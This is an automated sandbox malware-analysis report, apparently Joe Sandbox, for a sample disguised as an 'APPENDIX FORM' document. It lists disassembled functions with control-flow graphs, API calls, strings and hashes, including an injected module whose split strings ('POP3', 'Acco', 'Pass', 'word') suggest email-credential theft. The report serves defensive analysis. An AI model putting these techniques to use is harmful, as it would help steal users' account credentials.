                                                                                                              control_flow_graph 422 403afb-403b0d 423 403b13-403b19 422->423 424 403c4e-403c5d 422->424 423->424 425 403b1f-403b28 423->425 426 403cac-403cc1 424->426 427 403c5f-403ca7 GetDlgItem * 2 call 403fce SetClassLongA call 40140b 424->427 428 403b2a-403b37 SetWindowPos 425->428 429 403b3d-403b40 425->429 431 403d01-403d06 call 40401a 426->431 432 403cc3-403cc6 426->432 427->426 428->429 436 403b42-403b54 ShowWindow 429->436 437 403b5a-403b60 429->437 441 403d0b-403d26 431->441 433 403cc8-403cd3 call 401389 432->433 434 403cf9-403cfb 432->434 433->434 455 403cd5-403cf4 SendMessageA 433->455 434->431 440 403f9b 434->440 436->437 442 403b62-403b77 DestroyWindow 437->442 443 403b7c-403b7f 437->443 448 403f9d-403fa4 440->448 446 403d28-403d2a call 40140b 441->446 447 403d2f-403d35 441->447 449 403f78-403f7e 442->449 451 403b81-403b8d SetWindowLongA 443->451 452 403b92-403b98 443->452 446->447 458 403f59-403f72 DestroyWindow EndDialog 447->458 459 403d3b-403d46 447->459 449->440 456 403f80-403f86 449->456 451->448 453 403c3b-403c49 call 404035 452->453 454 403b9e-403baf GetDlgItem 452->454 453->448 460 403bb1-403bc8 SendMessageA IsWindowEnabled 454->460 461 403bce-403bd1 454->461 455->448 456->440 463 403f88-403f91 ShowWindow 456->463 458->449 459->458 464 403d4c-403d99 call 405d02 call 403fce * 3 GetDlgItem 459->464 460->440 460->461 465 403bd3-403bd4 461->465 466 403bd6-403bd9 461->466 463->440 492 403da3-403ddf ShowWindow EnableWindow call 403ff0 EnableWindow 464->492 493 403d9b-403da0 464->493 469 403c04-403c09 call 403fa7 465->469 470 403be7-403bec 466->470 471 403bdb-403be1 466->471 469->453 473 403c22-403c35 SendMessageA 470->473 475 403bee-403bf4 470->475 471->473 474 403be3-403be5 471->474 473->453 474->469 479 403bf6-403bfc call 40140b 475->479 480 403c0b-403c14 call 40140b 475->480 490 403c02 479->490 480->453 489 403c16-403c20 480->489 489->490 490->469 496 403de1-403de2 492->496 497 403de4 492->497 493->492 498 403de6-403e14 GetSystemMenu EnableMenuItem SendMessageA 496->498 497->498 499 403e16-403e27 SendMessageA 498->499 500 403e29 498->500 501 403e2f-403e68 call 404003 call 405ce0 lstrlenA call 405d02 SetWindowTextA call 401389 499->501 500->501 501->441 510 403e6e-403e70 501->510 510->441 511 403e76-403e7a 510->511 512 403e99-403ead DestroyWindow 511->512 513 403e7c-403e82 511->513 512->449 515 403eb3-403ee0 CreateDialogParamA 512->515 513->440 514 403e88-403e8e 513->514 514->441 516 403e94 514->516 515->449 517 403ee6-403f3d call 403fce GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 515->517 516->440 517->440 522 403f3f-403f57 ShowWindow call 40401a 517->522 522->449
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B37
                                                                                                              • ShowWindow.USER32(?), ref: 00403B54
                                                                                                              • DestroyWindow.USER32 ref: 00403B68
                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B84
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403BA5
                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB9
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BC0
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403C6E
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C78
                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403C92
                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403CE3
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403D89
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403DAA
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403DBC
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403DD7
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DED
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403DF4
                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E0C
                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1F
                                                                                                              • lstrlenA.KERNEL32(0041FCE0,?,0041FCE0,00422EE0), ref: 00403E48
                                                                                                              • SetWindowTextA.USER32(?,0041FCE0), ref: 00403E57
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403F8B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 184305955-0
                                                                                                              • Opcode ID: 962ad7cc4fa2b42c88e1abd63dfcf2964180e1ed05a6753e58ab042146502ff5
                                                                                                              • Instruction ID: 21636550a0957eda034e59b3f0d86482ba9c2b0b2001697664a7690c7cb4d951
                                                                                                              • Opcode Fuzzy Hash: 962ad7cc4fa2b42c88e1abd63dfcf2964180e1ed05a6753e58ab042146502ff5
                                                                                                              • Instruction Fuzzy Hash: D4C19171A08205BBDB216F61ED49E2B3E7DFB4470AB40443EF601B12E1C7799942EB5E
                                                                                                              Function 00403769 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 525 403769-403781 call 40600b 528 403783-403793 call 405c3e 525->528 529 403795-4037c6 call 405bc7 525->529 538 4037e9-403812 call 403a2e call 40585e 528->538 534 4037c8-4037d9 call 405bc7 529->534 535 4037de-4037e4 lstrcatA 529->535 534->535 535->538 543 403818-40381d 538->543 544 403899-4038a1 call 40585e 538->544 543->544 545 40381f-403843 call 405bc7 543->545 550 4038a3-4038aa call 405d02 544->550 551 4038af-4038d4 LoadImageA 544->551 545->544 552 403845-403847 545->552 550->551 554 403955-40395d call 40140b 551->554 555 4038d6-403906 RegisterClassA 551->555 556 403858-403864 lstrlenA 552->556 557 403849-403856 call 40579b 552->557 569 403967-403972 call 403a2e 554->569 570 40395f-403962 554->570 558 403a24 555->558 559 40390c-403950 SystemParametersInfoA CreateWindowExA 555->559 563 403866-403874 lstrcmpiA 556->563 564 40388c-403894 call 405770 call 405ce0 556->564 557->556 561 403a26-403a2d 558->561 559->554 563->564 568 403876-403880 GetFileAttributesA 563->568 564->544 573 403882-403884 568->573 574 403886-403887 call 4057b7 568->574 578 403978-403995 ShowWindow LoadLibraryA 569->578 579 4039fb-403a03 call 40509d 569->579 570->561 573->564 573->574 574->564 580 403997-40399c LoadLibraryA 578->580 581 40399e-4039b0 GetClassInfoA 578->581 587 403a05-403a0b 579->587 588 403a1d-403a1f call 40140b 579->588 580->581 583 4039b2-4039c2 GetClassInfoA RegisterClassA 581->583 584 4039c8-4039f9 DialogBoxParamA call 40140b call 4036b9 581->584 583->584 584->561 587->570 591 403a11-403a18 call 40140b 587->591 588->558 591->570
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                                • Part of subcall function 0040600B: LoadLibraryA.KERNEL32(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                                • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              • lstrcatA.KERNEL32(0042A000,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,0042A400,771B3410,00429000,00000000), ref: 004037E4
                                                                                                              • lstrlenA.KERNEL32(00422680,?,?,?,00422680,00000000,00429400,0042A000,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,0042A400), ref: 00403859
                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386C
                                                                                                              • GetFileAttributesA.KERNEL32(00422680), ref: 00403877
                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00429400), ref: 004038C0
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004038FD
                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403915
                                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040394A
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403980
                                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 00403991
                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399C
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AC
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B9
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004039C2
                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403AFB,00000000), ref: 004039E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                              • API String ID: 914957316-2904746566
                                                                                                              • Opcode ID: f94a0756b1cebeebc8a13aff1c953307ced624bb20df0d09e51a8acfa9e4b9c6
                                                                                                              • Instruction ID: 57fda68e32d43d3754214604e7ed5e061be8654ed587f540489ffd1693c16f19
                                                                                                              • Opcode Fuzzy Hash: f94a0756b1cebeebc8a13aff1c953307ced624bb20df0d09e51a8acfa9e4b9c6
                                                                                                              • Instruction Fuzzy Hash: 6961B3B16442007ED320AF659D45F2B3E6CEB4474AF40457FF944B22E1D7BD6D029A2E
                                                                                                              Function 00404117 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 596 404117-404127 597 404239-40424c 596->597 598 40412d-404135 596->598 599 4042a8-4042ac 597->599 600 40424e-404257 597->600 601 404137-404146 598->601 602 404148-4041e0 call 403fce * 2 CheckDlgButton call 403ff0 GetDlgItem call 404003 SendMessageA 598->602 606 4042b2-4042c6 GetDlgItem 599->606 607 40437c-404383 599->607 603 40438b 600->603 604 40425d-404265 600->604 601->602 634 4041e2-4041e5 GetSysColor 602->634 635 4041eb-404234 SendMessageA * 2 lstrlenA SendMessageA * 2 602->635 610 40438e-404395 call 404035 603->610 604->603 608 40426b-404277 604->608 612 4042c8-4042cf 606->612 613 40433a-404341 606->613 607->603 609 404385 607->609 608->603 615 40427d-4042a3 GetDlgItem SendMessageA call 403ff0 call 4043a1 608->615 609->603 621 40439a-40439e 610->621 612->613 618 4042d1-4042ec 612->618 613->610 614 404343-40434a 613->614 614->610 619 40434c-404350 614->619 615->599 618->613 623 4042ee-404337 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 618->623 624 404352-404361 SendMessageA 619->624 625 404363-404367 619->625 623->613 624->625 628 404377-40437a 625->628 629 404369-404375 SendMessageA 625->629 628->621 629->628 634->635 635->621
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041A2
                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004041B6
                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041D4
                                                                                                              • GetSysColor.USER32(?), ref: 004041E5
                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F4
                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404203
                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404206
                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404215
                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040422A
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040428C
                                                                                                              • SendMessageA.USER32(00000000), ref: 0040428F
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042BA
                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042FA
                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00404309
                                                                                                              • SetCursor.USER32(00000000), ref: 00404312
                                                                                                              • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 00404325
                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404332
                                                                                                              • SetCursor.USER32(00000000), ref: 00404335
                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404361
                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404375
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                              • String ID: N$open$@@
                                                                                                              • API String ID: 3615053054-1065644463
                                                                                                              • Opcode ID: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
                                                                                                              • Instruction ID: 48be33ef10acdba92a50f670ec3bcd7ef70e1bb9311df19d6f40dceb05da6325
                                                                                                              • Opcode Fuzzy Hash: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
                                                                                                              • Instruction Fuzzy Hash: 306183B1A40205BFEB109F61CC45F6A7B69EB84715F10803AFF05BA2D1C7B8A951CF99
                                                                                                              Function 333E173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 636 333e173a-333e17fe call 333ec030 call 333e2c40 * 2 643 333e1803 call 333e1cca 636->643 644 333e1808-333e180c 643->644 645 333e19ad-333e19b1 644->645 646 333e1812-333e1816 644->646 646->645 647 333e181c-333e1837 call 333e1ede 646->647 650 333e199f-333e19ac call 333e1ee7 * 2 647->650 651 333e183d-333e1845 647->651 650->645 652 333e184b-333e184e 651->652 653 333e1982-333e1985 651->653 652->653 657 333e1854-333e1881 call 333e44b0 * 2 call 333e1db7 652->657 655 333e1987 653->655 656 333e1995-333e1999 653->656 659 333e198a-333e198d call 333e2c40 655->659 656->650 656->651 670 333e193d-333e1943 657->670 671 333e1887-333e189f call 333e44b0 call 333e1db7 657->671 665 333e1992 659->665 665->656 672 333e197e-333e1980 670->672 673 333e1945-333e1947 670->673 671->670 685 333e18a5-333e18a8 671->685 672->659 673->672 676 333e1949-333e194b 673->676 678 333e194d-333e194f 676->678 679 333e1961-333e197c call 333e16aa 676->679 682 333e1955-333e1957 678->682 683 333e1951-333e1953 678->683 679->665 686 333e195d-333e195f 682->686 687 333e1959-333e195b 682->687 683->679 683->682 688 333e18aa-333e18c2 call 333e44b0 call 333e1db7 685->688 689 333e18c4-333e18dc call 333e44b0 call 333e1db7 685->689 686->672 686->679 687->679 687->686 688->689 698 333e18e2-333e193b call 333e16aa call 333e15da call 333e2c40 * 2 688->698 689->656 689->698 698->656
                                                                                                              APIs
                                                                                                                • Part of subcall function 333E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D1B
                                                                                                                • Part of subcall function 333E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 333E1D37
                                                                                                                • Part of subcall function 333E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D4B
                                                                                                              • _strlen.LIBCMT ref: 333E1855
                                                                                                              • _strlen.LIBCMT ref: 333E1869
                                                                                                              • _strlen.LIBCMT ref: 333E188B
                                                                                                              • _strlen.LIBCMT ref: 333E18AE
                                                                                                              • _strlen.LIBCMT ref: 333E18C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                              • API String ID: 3296212668-3023110444
                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                              • Instruction ID: f793f11cfb9f99987807b9d7d39b2fc34e91fc0b51f611b2d4baa6e76222b974
                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                              • Instruction Fuzzy Hash: B361E3B7D04338ABEF158FA4CC80BDEF7B9AF45204F448056E105A7290EB745A85CF92
                                                                                                              Function 333E19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strlen
                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                              • API String ID: 4218353326-230879103
                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                              • Instruction ID: 9c2df0e3ba552710b068be249f2415e00964da369cd26b521be3b401585640f2
                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                              • Instruction Fuzzy Hash: 2271E3B7D042385BDF229FA4DCC4AEFBBFCAB09240F548096D544E7241E6749B85CBA0
                                                                                                              Function 00405A18 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 776 405a18-405a3f lstrcpyA 777 405a41-405a59 call 405971 CloseHandle GetShortPathNameA 776->777 778 405a67-405a76 GetShortPathNameA 776->778 781 405b8e-405b93 777->781 784 405a5f-405a61 777->784 780 405a7c-405a7e 778->780 778->781 780->781 783 405a84-405ac2 wsprintfA call 405d02 call 405971 780->783 783->781 789 405ac8-405ae4 GetFileSize GlobalAlloc 783->789 784->778 784->781 790 405b87-405b88 CloseHandle 789->790 791 405aea-405af4 call 4059e9 789->791 790->781 791->790 794 405afa-405b07 call 4058d6 791->794 797 405b09-405b1b lstrcpyA 794->797 798 405b1d-405b2f call 4058d6 794->798 799 405b52 797->799 803 405b31-405b37 798->803 804 405b4e 798->804 802 405b54-405b81 call 40592c SetFilePointer WriteFile GlobalFree 799->802 802->790 806 405b3f-405b41 803->806 804->799 808 405b43-405b4c 806->808 809 405b39-405b3e 806->809 808->802 809->806
                                                                                                              APIs
                                                                                                              • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A28
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A4C
                                                                                                              • GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A55
                                                                                                                • Part of subcall function 004058D6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
                                                                                                                • Part of subcall function 004058D6: lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
                                                                                                              • GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A72
                                                                                                              • wsprintfA.USER32 ref: 00405A90
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405ACB
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405ADA
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B12
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B7A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405B81
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405B88
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNEL32(00000003,00402CBE,0042AC00,80000000,00000003), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                              • String ID: %s=%s$NUL$[Rename]
                                                                                                              • API String ID: 1265525490-4148678300
                                                                                                              • Opcode ID: b2a8a82cc1dbdd596541406d3a7cb4088ed287b027b0234e96387c743e3667b6
                                                                                                              • Instruction ID: b5c81c1859d8f1192d2ecd791256e289f06fc5ca0860dc0d9e47344a35b8d296
                                                                                                              • Opcode Fuzzy Hash: b2a8a82cc1dbdd596541406d3a7cb4088ed287b027b0234e96387c743e3667b6
                                                                                                              • Instruction Fuzzy Hash: 2F41CE71604B19BFD2206B615C49F7B3A6CEB45764F14013AFD05B62D2EA7CB8018E7E
                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextA.USER32(00000000,00422EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                              • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                                                              • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                              • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                                                                              Function 333E7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 333E7D06
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90D7
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90E9
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90FB
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E910D
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E911F
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9131
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9143
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9155
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9167
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9179
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E918B
